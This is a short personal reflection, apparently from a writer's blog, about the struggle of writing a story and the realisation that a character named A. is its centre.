Lately, trying to write my story has felt like

wrestling a bull,

or

reaching for stars in a cloudy, dark night.

Those are two very different metaphors, yet they both paint accurate pictures.

Lately I’ve been asking myself, what is the center of my story? What is it that holds it all together, that makes the story—what I knew at the birth of my vision, at the first whispers of my inspiration? And it all comes back to this character.

A.

A. is the center of it all. Maybe I should stop all that peripheral writing for a little while, and just focus on him. Write about his introduction into the story, the influence and feel of his presence. The scenes where he makes magic happen. He makes the story.
